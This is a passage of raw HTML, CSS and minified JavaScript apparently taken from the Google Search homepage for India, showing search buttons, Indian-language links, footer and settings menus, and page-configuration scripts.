role="listbox"></ul><style>#shJ2Vb{display:none}.OBMEnb{padding:0;margin:0}.G43f7e{display:flex;flex-direction:column;min-width:0;padding:0}.Ye4jfc{flex-direction:row;flex-wrap:wrap}</style><div jsname="E80e9e" class="OBMEnb" id="shJ2Vb" role="presentation"><ul jsname="bw4e9b" class="G43f7e" role="listbox"></ul></div><style>#ynRric{display:none}.ynRric{list-style-type:none;flex-direction:column;color:#70757a;font-family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><div class="ynRric" id="ynRric" role="presentation"></div><style>#YMXe{display:none}.sbct{display:flex;align-items:center;min-width:0;padding:0;}.eIPGRd{flex:auto;display:flex;align-items:center;margin:0 20px 0 14px}.pcTkSc{display:flex;flex:auto;flex-direction:column;min-width:0;padding:6px 0}.sbic{display:flex;align-items:center;margin:0 13px 0 1px;}.sbic.vYOkbe{background:center/contain no-repeat;border-radius:4px;min-height:32px;min-width:32px;margin:4px 7px 4px -5px;}.sbre .wM6W7d{line-height:18px}.ClJ9Yb{line-height:12px;font-size:13px;color:#80868b;margin-top:2px}.wM6W7d{display:flex;font-size:16px;color:#212121;flex:auto;align-items:center;word-break:break-all;padding-right:8px}.minidiv .wM6W7d{font-size:14px}.WggQGd{color:#52188c}.wM6W7d span{flex:auto}.AQZ9Vd{display:flex;align-self:stretch;}.JCHpcb:hover{color:#1a73e8;text-decoration:underline;}.JCHpcb{color:#80868b;font:13px arial,sans-serif;cursor:pointer;align-self:center}.sbhl{background:#eee;}.mus_pc{display:block;margin:6px 0}.mus_il{font-family:Arial,HelveticaNeue-Light,HelveticaNeue,Helvetica;padding-top:7px;position:relative}.mus_il:first-child{padding-top:0}.mus_il_at{margin-left:10px}.mus_il_st{right:52px;position:absolute}.mus_il_i{align:left;margin-right:10px}.mus_it3{margin-bottom:3px;max-height:24px;vertical-align:bottom}.mus_it5{height:24px;width:24px;vertical-align:bottom;margin-left:10px;margin-right:10px;transform:rotate(90deg)}.mus_tt3{color:#767676;font-size:12px;vertical-align:top}.mus_tt5{color:#d93025;font-size:14px}.mus_tt6{color:#188038;font-size:14px}.mus_tt8{font-size:16px;font-family:Arial,sans-serif}.mus_tt17{color:#212121;font-size:20px}.mus_tt18{color:#212121;font-size:24px}.mus_tt19{color:#767676;font-size:12px}.mus_tt20{color:#767676;font-size:14px}.mus_tt23{color:#767676;font-size:18px}</style><li data-view-type="1" class="sbct" id="YMXe" role="presentation"><div class="eIPGRd"><div class="sbic"></div><div class="pcTkSc" role="option"><div class="wM6W7d"><span></span></div><div class="ClJ9Yb"><span></span></div></div><div class="AQZ9Vd"><div class="sbai">Remove</div></div></div></li><div class="CqAVzb lJ9FBc" jsname="VlcLAe"> <style>.lJ9FBc{height:70px}.lJ9FBc input[type="submit"],.gbqfba{background-color:#f8f9fa;border:1px solid #f8f9fa;border-radius:4px;color:#3c4043;font-family:arial,sans-serif;font-size:14px;margin:11px 4px;padding:0 16px;line-height:27px;height:36px;min-width:54px;text-align:center;cursor:pointer;user-select:none}.lJ9FBc input[type="submit"]:hover{box-shadow:0 1px 1px rgba(0,0,0,.1);background-color:#f8f9fa;border:1px solid #dadce0;color:#202124}.lJ9FBc input[type="submit"]:focus{border:1px solid #4285f4;outline:none}input:focus{outline:none}input::-moz-focus-inner{border:0}</style> <center> <input class="gNO89b" value="Google Search" aria-label="Google Search" name="btnK" role="button" tabindex="0" type="submit" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ4dUDCAY"> <input class="RNmpXc" value="I'm Feeling Lucky" aria-label="I'm Feeling Lucky" name="btnI" type="submit" jsaction="trigger.kWlxhc" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ19QECAc"> </center> </div></div><style>.MG7lrf{font-size:8pt;margin-top:-16px;position:absolute;right:16px}</style><div jsname="JUypV" jscontroller="OqGDve" class="MG7lrf" data-async-context="async_id:duf3-46;authority:0;card_id:;entry_point:0;feature_id:;ftoe:0;header:0;is_jobs_spam_form:0;open:0;preselect_answer_index:-1;suggestions:;suggestions_subtypes:;suggestions_types:;surface:0;title:;type:46"><style>a.oBa0Fe{color:#70757a;float:right;font-style:italic;tap-highlight-color:rgba(0,0,0,.00);tap-highlight-color:rgba(0,0,0,.00)}a.aciXEb{padding:0 5px;}.RTZ84b{color:#70757a;cursor:pointer;padding-right:8px}.XEKxtf{color:#70757a;float:right;font-size:12px;line-height:16px;padding-bottom:4px}</style><div jscontroller="EkevXb" style="display:none" jsaction="rcuQ6b:npT2md"></div><div id="duf3-46" data-jiis="up" data-async-type="duffy3" data-async-context-required="type,open,feature_id,async_id,entry_point,authority,card_id,ftoe,title,header,suggestions,surface,suggestions_types,suggestions_subtypes,preselect_answer_index,is_jobs_spam_form" class="yp" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ-0EICA"></div><a class="oBa0Fe aciXEb" href="#" id="sbfblt" data-async-trigger="duf3-46" role="button" jsaction="trigger.szjOR" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQtw8ICQ">Report inappropriate predictions</a></div></div><div class="FPdoLc lJ9FBc"> <center> <input class="gNO89b" value="Google Search" aria-label="Google Search" name="btnK" role="button" tabindex="0" type="submit" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ4dUDCAo"> <input class="RNmpXc" value="I'm Feeling Lucky" aria-label="I'm Feeling Lucky" name="btnI" type="submit" jsaction="trigger.kWlxhc" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ19QECAs"> </center> </div></div> <div style="background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp)"> </div> </div> <div id="tophf"><input name="source" type="hidden" value="hp"><input value="yfQuYoCLLoHz-QajyqPIBQ" name="ei" type="hidden"><input value="AHkkrS4AAAAAYi8C2ZZcsM9jaeOrROovmu_Op1to5z_4" name="iflsig" type="hidden"></div></form></div><div class="o3j99 qarstb"><style>.vcVZ7d{text-align:center}</style><div class="vcVZ7d" id="gws-output-pages-elements-homepage_additional_languages__als"><style>#gws-output-pages-elements-homepage_additional_languages__als{font-size:small;margin-bottom:24px}#SIvCob{color:#3c4043;display:inline-block;line-height:28px;}#SIvCob a{padding:0 3px;}.H6sW5{display:inline-block;margin:0 2px;white-space:nowrap}.z4hgWe{display:inline-block;margin:0 2px}</style><div id="SIvCob">Google offered in: <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=hi&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCA0">हिन्दी</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=bn&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCA4">বাংলা</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=te&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCA8">తెలుగు</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=mr&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBA">मराठी</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=ta&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBE">தமிழ்</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=gu&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBI">ગુજરાતી</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=kn&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBM">ಕನ್ನಡ</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=ml&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBQ">മലയാളം</a> <a href="https://www.google.com/setprefs?sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&hl=pa&source=homepage&sa=X&ved=0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ2ZgBCBU">ਪੰਜਾਬੀ</a> </div></div></div><div class="o3j99 c93Gbe"><style>.c93Gbe{background:#f2f2f2}.uU7dJb{padding:15px 30px;border-bottom:1px solid #dadce0;font-size:15px;color:#70757a}.SSwjIe{padding:0 20px}.KxwPGc{display:flex;flex-wrap:wrap;justify-content:space-between}@media only screen and (max-width:1200px){.KxwPGc{justify-content:space-evenly}}.pHiOh{display:block;padding:15px;white-space:nowrap}a.pHiOh{color:#70757a}</style><div class="uU7dJb">India</div><div jscontroller="NzU6V" class="KxwPGc SSwjIe" data-sfe="false" data-sfsw="1200" jsaction="rcuQ6b:npT2md"><div class="KxwPGc AghGtd"><a class="pHiOh" href="https://about.google/?utm_source=google-IN&utm_medium=referral&utm_campaign=hp-footer&fg=1" data-jsarwt="1" data-usg="AOvVaw33zjaJZ_ogw8iPEm4kPGYh" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQkNQCCBY">About</a><a class="pHiOh" href="https://www.google.com/intl/en_in/ads/?subid=ww-ww-et-g-awa-a-g_hpafoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpafooter&fg=1" data-jsarwt="1" data-usg="AOvVaw3Oj62V1xNd5oAI6Vxou5Lx" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQkdQCCBc">Advertising</a><a class="pHiOh" href="https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpbfooter&fg=1" data-jsarwt="1" data-usg="AOvVaw2SJ4zwRVXKyZr53qG9dm4K" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQktQCCBg">Business</a><a class="pHiOh" href="https://google.com/search/howsearchworks/?fg=1"> How Search works </a></div><div class="KxwPGc iTjxkf"><a class="pHiOh" href="https://policies.google.com/privacy?hl=en-IN&fg=1" data-jsarwt="1" data-usg="AOvVaw2y-DJehqHRQuhUzwsARmol" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ8awCCBk">Privacy</a><a class="pHiOh" href="https://policies.google.com/terms?hl=en-IN&fg=1" data-jsarwt="1" data-usg="AOvVaw25sheD5OGrPUyBw_FdCQOy" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ8qwCCBo">Terms</a><div jscontroller="LtQuz" class="ayzqOc"><style>.ayzqOc{position:relative}.EzVRq{display:block;padding:15px;white-space:nowrap}a.EzVRq,button.EzVRq{color:#70757a}button.EzVRq{cursor:pointer;width:100%;text-align:left}button.EzVRq:hover,button.EzVRq:active{text-decoration:underline}.Qff0zd{display:none;position:absolute;list-style:none;background:#fff;border:1px solid #70757a}</style><style>.Qff0zd{min-width:200px}.mRoO9c{display:block;border-top:1px solid #ebebeb}.pENqnf{color:#70757a;cursor:pointer;padding-bottom:10px;padding-top:10px}</style><button jsname="pzCKEc" class="EzVRq" aria-controls="dEjpnf" aria-haspopup="true" id="Mses6b" jsaction="mousedown:lgs1Pb;FwYIgd;keydown:QXPedb">Settings</button><ul jsname="xl07Ob" class="Qff0zd" aria-labelledby="Mses6b" id="dEjpnf" role="menu" jsaction="keydown:OEXC3c;focusout:Y48pVb"><li role="none"><a class="EzVRq" href="https://www.google.com/preferences?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search settings</a></li><li role="none"><a class="EzVRq" href="/advanced_search?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Advanced search</a></li><li role="none"><a class="EzVRq" href="/history/privacyadvisor/search/unauth?utm_source=googlemenu&fg=1" role="menuitem" tabindex="-1">Your data in Search</a></li><li role="none"><a class="EzVRq" href="/history/optout?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search history</a></li><li role="none"><a class="EzVRq" href="https://support.google.com/websearch/?p=ws_results_help&hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search help</a></li><li role="none"><button class="EzVRq" data-bucket="websearch" role="menuitem" tabindex="-1" jsaction="trigger.YcfJ">Send feedback</button></li><li class="mRoO9c" role="separator"></li><li role="none"><div class="EzVRq pENqnf" data-spl="/setprefs?hl=en&prev=https://www.google.com/?gws_rd%3Dssl%26pccc%3D1&sig=0_M5hd1pQYDD4MxK2uQg9eiFNt3os%3D&cs=2" id="YUIDDb" role="menuitem" tabindex="-1"><style>.tFYjZe{align-items:center;display:flex;justify-content:space-between;padding-bottom:4px;padding-top:4px}.tFYjZe:hover .iOHNLb,.tFYjZe:focus .iOHNLb{opacity:1}.iOHNLb{color:#70757a;height:20px;margin-top:-2px;opacity:0;width:20px}</style><div jscontroller="fXO0xe" class="tFYjZe" data-bsdm="0" data-btf="0" data-hbc="#1a73e8" data-htc="#fff" data-spt="1" data-tsdm="0" role="link" tabindex="0" jsaction="ok5gFc;x6BCfb:ggFCce;w3Ukrf:aelxJb" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQqsEHCBs"><div>Dark theme: Off</div><div class="iOHNLb"><span style="height:20px;line-height:20px;width:20px" class="z1asCe aqvxcd"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><rect fill="none" height="24" width="24"></rect><path d="M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0 c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2 c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1 C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06 c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41 l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41 c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36 c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg></span></div></div></div></li></ul></div></div></div><div jscontroller="GU4Gab" style="display:none" data-pcs="0" jsaction="rcuQ6b:npT2md"></div></div></div><div class="Fgvgjc"><style>.Fgvgjc{height:0;overflow:hidden}</style><div class="gTMtLb fp-nh" id="lb"><style>.gTMtLb{z-index:1001;position:absolute;top:-1000px}</style></div><span style="display:none"><span jscontroller="DhPYme" style="display:none" data-du="1" jsaction="rcuQ6b:npT2md"></span></span><script nonce="8M/qAlUr4l/+csJGNfb3NA==">this.gbar_=this.gbar_||{};(function(_){var window=this; try{ _.ie=function(a,b,c){if(!a.o)if(c instanceof Array){c=_.Ua(c);for(var d=c.next();!d.done;d=c.next())_.ie(a,b,d.value)}else{d=(0,_.y)(a.F,a,b);var e=a.B+c;a.B++;b.setAttribute("data-eqid",e);a.D[e]=d;b&&b.addEventListener?b.addEventListener(c,d,!1):b&&b.attachEvent?b.attachEvent("on"+c,d):a.A.log(Error("B`"+b))}}; }catch(e){_._DumpException(e)} try{ /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ _.je=function(){if(!_.n.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{_.n.addEventListener("test",_.gb,b),_.n.removeEventListener("test",_.gb,b)}catch(c){}return a}(); _.ke=_.Gb?"webkitTransitionEnd":"transitionend"; }catch(e){_._DumpException(e)} try{ var le=document.querySelector(".gb_z .gb_A"),me=document.querySelector("#gb.gb_Hc");le&&!me&&_.ie(_.$d,le,"click"); }catch(e){_._DumpException(e)} try{ var Qh=function(a){_.H.call(this);this.C=a;this.A=null;this.o={};this.D={};this.j={};this.B=null};_.w(Qh,_.H);_.Rh=function(a){if(a.A)return a.A;for(var b in a.j)if(a.j[b].He()&&a.j[b].Fb())return a.j[b];return null};_.h=Qh.prototype;_.h.Ze=function(a){a&&_.Rh(this)&&a!=_.Rh(this)&&_.Rh(this).Cd(!1);this.A=a};_.h.$f=function(a){a=this.j[a]||a;return _.Rh(this)==a};_.h.re=function(a,b){b=b.Bc();if(this.o[a]&&this.o[a][b])for(var c=0;c<this.o[a][b].length;c++)try{this.o[a][b][c]()}catch(d){this.C.log(d)}}; _.h.nh=function(a){return!this.D[a.Bc()]};_.h.yg=function(a){this.j[a]&&(_.Rh(this)&&_.Rh(this).Bc()==a||this.j[a].Cd(!0))};_.h.Ta=function(a){this.B=a;for(var b in this.j)this.j[b].He()&&this.j[b].Ta(a)};_.h.Ve=function(a){this.j[a.Bc()]=a};_.h.je=function(a){return a in this.j?this.j[a]:null};var Sh=new Qh(_.J);_.Ad("dd",Sh); }catch(e){_._DumpException(e)} try{ var sj=document.querySelector(".gb_La .gb_A"),tj=document.querySelector("#gb.gb_Hc");sj&&!tj&&_.ie(_.$d,sj,"click"); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. this.gbar_=this.gbar_||{};(function(_){var window=this; try{ /* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ _.ne=function(a,b){return 0<=(0,_.ub)(a,b)};_.oe=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};try{(new self.OffscreenCanvas(0,0)).getContext("2d")}catch(a){}_.pe=_.C||_.Gb; _.qe=function(a,b){this.width=a;this.height=b};_.h=_.qe.prototype;_.h.clone=function(){return new _.qe(this.width,this.height)};_.h.aspectRatio=function(){return this.width/this.height};_.h.Vb=function(){return!(this.width*this.height)};_.h.ceil=function(){this.width=Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.h.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this}; _.h.round=function(){this.width=Math.round(this.width);this.height=Math.round(this.height);return this}; var se,ve;_.re=function(a,b){return(b||document).getElementsByTagName(String(a))};_.te=function(a,b){_.Ka(b,function(c,d){c&&"object"==typeof c&&c.Nb&&(c=c.nb());"style"==d?a.style.cssText=c:"class"==d?a.className=c:"for"==d?a.htmlFor=c:se.hasOwnProperty(d)?a.setAttribute(se[d],c):0==d.lastIndexOf("aria-",0)||0==d.lastIndexOf("data-",0)?a.setAttribute(d,c):a[d]=c})}; se={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valign:"vAlign",width:"width"};_.we=function(a,b){var c=b[1],d=_.ue(a,String(b[0]));c&&("string"===typeof c?d.className=c:Array.isArray(c)?d.className=c.join(" "):_.te(d,c));2<b.length&&ve(a,d,b);return d}; ve=function(a,b,c){function d(k){k&&b.appendChild("string"===typeof k?a.createTextNode(k):k)}for(var e=2;e<c.length;e++){var f=c[e];if(!_.ib(f)||_.jb(f)&&0<f.nodeType)d(f);else{a:{if(f&&"number"==typeof f.length){if(_.jb(f)){var g="function"==typeof f.item||"string"==typeof f.item;break a}if("function"===typeof f){g="function"==typeof f.item;break a}}g=!1}_.vb(g?_.la(f):f,d)}}};_.xe=function(a){return _.ue(document,a)}; _.ue=function(a,b){b=String(b);"application/xhtml+xml"===a.contentType&&(b=b.toLowerCase());return a.createElement(b)};_.ye=function(a){for(var b;b=a.firstChild;)a.removeChild(b)};_.ze=function(a){return _.jb(a)&&1==a.nodeType};_.Ae=function(a){return 9==a.nodeType?a:a.ownerDocument||a.document};_.Be=function(a,b,c){for(var d=0;a&&(null==c||d<=c);){if(b(a))return a;a=a.parentNode;d++}return null}; }catch(e){_._DumpException(e)} try{ _.xj=function(a){_.G.call(this,a)};_.w(_.xj,_.G); }catch(e){_._DumpException(e)} try{ _.yj=function(a,b,c){a.rel=c;-1!=c.toLowerCase().indexOf("stylesheet")?(a.href=_.Rc(b),(b=_.pd(a.ownerDocument&&a.ownerDocument.defaultView))&&a.setAttribute("nonce",b)):a.href=b instanceof _.Pc?_.Rc(b):b instanceof _.Uc?_.Vc(b):_.Vc(_.$c(b))}; }catch(e){_._DumpException(e)} try{ _.Aj=function(a){if("function"==typeof _.zj&&a instanceof _.zj)return a.j;throw Error("G");};_.Cj=function(a){return"function"==typeof _.Bj&&a instanceof _.Bj?_.Aj(a):_.Qc(a)};_.Dj=function(a){var b,c=(a.ownerDocument&&a.ownerDocument.defaultView||window).document,d=null===(b=c.querySelector)||void 0===b?void 0:b.call(c,"script[nonce]");(b=d?d.nonce||d.getAttribute("nonce")||"":"")&&a.setAttribute("nonce",b)}; /* SPDX-License-Identifier: Apache-2.0 */ }catch(e){_._DumpException(e)} try{ var Ej=function(a,b,c){_.Zd.log(46,{att:a,max:b,url:c})},Gj=function(a,b,c){_.Zd.log(47,{att:a,max:b,url:c});a<b?Fj(a+1,b):_.J.log(Error("fa`"+a+"`"+b),{url:c})},Fj=function(a,b){if(Hj){var c=_.xe("SCRIPT");c.async=!0;c.type="text/javascript";c.charset="UTF-8";c.src=_.Cj(Hj);_.Dj(c);c.onload=_.oe(Ej,a,b,c.src);c.onerror=_.oe(Gj,a,b,c.src);_.Zd.log(45,{att:a,max:b,url:c.src});_.re("HEAD")[0].appendChild(c)}},Ij=function(a){_.G.call(this,a)};_.w(Ij,_.G); var Jj=_.r(_.Vd,Ij,17)||new Ij,Kj,Hj=(Kj=_.r(Jj,_.xj,1))?_.Sc(_.D(Kj,4)||""):null,Lj,Mj=(Lj=_.r(Jj,_.xj,2))?_.Sc(_.D(Lj,4)||""):null,Nj=function(){Fj(1,2);if(Mj){var a=_.xe("LINK");a.setAttribute("type","text/css");_.yj(a,Mj,"stylesheet");var b=_.pd(void 0);b&&a.setAttribute("nonce",b);_.re("HEAD")[0].appendChild(a)}}; (function(){var a=_.Wd();if(_.F(a,18))Nj();else{var b=_.D(a,19)||0;window.addEventListener("load",function(){window.setTimeout(Nj,b)})}})(); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. </script><div><div><div class="gb_Fd">Google apps</div></div></div></div><textarea class="csi" name="csi" style="display:none"></textarea><script nonce="8M/qAlUr4l/+csJGNfb3NA==">(function(){ (function(){var c=Date.now();if(google.timers&&google.timers.load.t){for(var a=document.getElementsByTagName("img"),d=0,b=void 0;b=a[d++];)google.c.setup(b,!1,void 0);google.c.frt=!1;google.c.e("load","imn",String(a.length));google.c.ubr(!0,c);google.c.glu&&google.c.glu();google.rll(window,!1,function(){google.tick("load","ol");google.c.u("pr")})}})();}).call(this);(function(){google.jl={attn:false,blt:'none',chnk:0,dw:false,dwu:true,emtn:0,end:0,ine:false,injs:'none',injt:0,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22cdos\x22:{\x22cdobsel\x22:false},\x22cr\x22:{\x22qir\x22:false,\x22rctj\x22:true,\x22ref\x22:false,\x22uff\x22:false},\x22csi\x22:{},\x22d\x22:{},\x22dpf\x22:{},\x22dvl\x22:{\x22cookie_secure\x22:true,\x22cookie_timeout\x22:21600,\x22jsc\x22:\x22[null,null,null,30000,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[\\\x2286400000\\\x22,\\\x22604800000\\\x22,2],null,null,21600000,null,null,1,null,null,null,null,null,1]\x22,\x22msg_err\x22:\x22Location unavailable\x22,\x22msg_gps\x22:\x22Using GPS\x22,\x22msg_unk\x22:\x22Unknown\x22,\x22msg_upd\x22:\x22Update location\x22,\x22msg_use\x22:\x22Use precise location\x22,\x22use_local_storage_fallback\x22:false},\x22gf\x22:{\x22pid\x22:196},\x22hsm\x22:{},\x22jsa\x22:{\x22csi\x22:true,\x22csir\x22:100},\x22mu\x22:{\x22murl\x22:\x22https://adservice.google.com/adsid/google/ui\x22},\x22pHXghd\x22:{},\x22sb_wiz\x22:{\x22rfs\x22:[],\x22scq\x22:\x22\x22,\x22stok\x22:\x22MhZV0m7PJI3la8aPJxGkk4NWUow\x22},\x22sf\x22:{}}';google.pmc=JSON.parse(pmc);})();(function(){var r=['sb_wiz','aa','abd','async','dvl','mu','pHXghd','sf'];google.plm(r);})();(function(){var m=['Cc3pTk','[\x22gws-wiz\x22,\x22\x22,\x22\x22,\x22\x22,null,1,0,0,11,\x22en\x22,\x22MhZV0m7PJI3la8aPJxGkk4NWUow\x22,\x22\x22,\x22yfQuYoCLLoHz-QajyqPIBQ\x22,0,\x22en-IN\x22,null,null,null,3,5,null,-1,null,\x22\x22,-1,0,0,null,1,0,null,0,0,1800000,1,0,0,8,6,null,0,null,null,1,0,0,0,0,0.1,null,0,100,0,null,1.15,0,null,null,null,1,null,0,null,0,6,0,null,null,null,null,null,0,1,1,0,null,null,0,null,null,null,null,0,null,null,null,null,null,null,null,0,null,1,1,0,null,\x22\x22,0,1,0,-1,null,1,null,0,0,0,1028,10,10]']; var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"Yllh3e":"%.@.1647244489755072,182352257,1493755171]","LVIXXb":"1","eptZe":"/wizrpcui/_/WizRpcUi/","zChJod":"%.@.]","QrtxK":"0","w2btAe":"%.@.\"\",\"\",\"0\",null,null,null,1]","SNlM0e":"","GWsdKe":"en-IN","Im6cmf":"/wizrpcui/_/WizRpcUi","S06Grb":""};window.IJ_values=[false,false,true,true,true,false,false,false,"#4285f4","#f8f9fa","#1a73e8",36,24,28,6,"none",true,"0 1px 6px rgba(32,33,36,0.28)",false,"#fff","#fff","#dadce0","#3c4043","0 1px 2px rgba(60,64,67,.3), 0 2px 6px 2px rgba(60,64,67,.15)","#9aa0a6","#f1f3f4","#bdc1c6","#e8eaed","#dadce0","#9aa0a6","#f8f9fa","#202124","#e8f0fe","#d2e3fc","#d2e3fc","0 1px 2px rgba(66,133,244,.3), 0 1px 3px 1px rgba(66,133,244,.15)","#aecbfa","#8ab4f8","#d2e3fc","#174ea6","#1967d2","rgba(0,0,0,.54)","rgba(0,0,0,.26)","#fff","rgba(255,255,255,.30)",false,false,"invert(1) hue-rotate(180deg)","#b8bbbe",false,false,true,"0 1px 6px rgba(32,33,36,0.28)",6,true,true,false,false,false,false,false,false,"#3c4043",10,false,true,false,"#aecbfa","#1a73e8",false,false,"#f5f5f5","rgba(0,0,0,.87)",false,"#fff","0px 5px 26px 0px rgba(0, 0, 0, 0.22), 0px 20px 28px 0px rgba(0, 0, 0, 0.30)","#4285f4",false,true,false,"#4285f4",false,true,false,false,"#000","#4285f4","#4285f4","#4285f4","#e8f0fe","#1a73e8","#1558d6","#34a853","#1e8e3e","#188038","#ea4335","#d93025","#d93025","#fff","#81c995","#34a853","#dadce0","#dadce0","#dadce0","#f8f9fa","#f8f9fa","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#70757a","#70757a","#70757a","#3c4043","#202124","#202124","#fff","#fbbc04","#fbbc04","#f29900","#f1f3f4","#202124","#202124","#f1f3f4",14,"#202124",40,"#202124",false,"#70757a","#202124","#ea4335","#000","arial,sans-serif-medium,sans-serif","arial,sans-serif","#000","#dadce0","#000","#70757a","#1a73e8",false,false,false,false,false,false,true,false,false,false,"0 2px 10px 0 rgba(0,0,0,0.2)",false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","#70757a","#202124","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","rgba(0,0,0,.12)","#323232","#fff","rgba(255,255,255,.30)","#fff","#202124","#fff","Roboto,RobotoDraft,Helvetica,Arial,sans-serif","14px","500","500","pointer","0 1px 1px rgba(0,0,0,.16)","0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12)",true,"#000","0 4px 16px rgba(0,0,0,0.2)","#666",200,false,true,false,true,true,false,true,true,false,true,14,"#fff","#fff",false,"#000","1px solid #dadce0","none","arial,sans-serif-medium,sans-serif","Google Sans,arial,sans-serif-medium,sans-serif","arial,sans-serif","#ebebeb","1px solid #dadce0","1px solid #dadce0","#202124","0 2px 10px 0 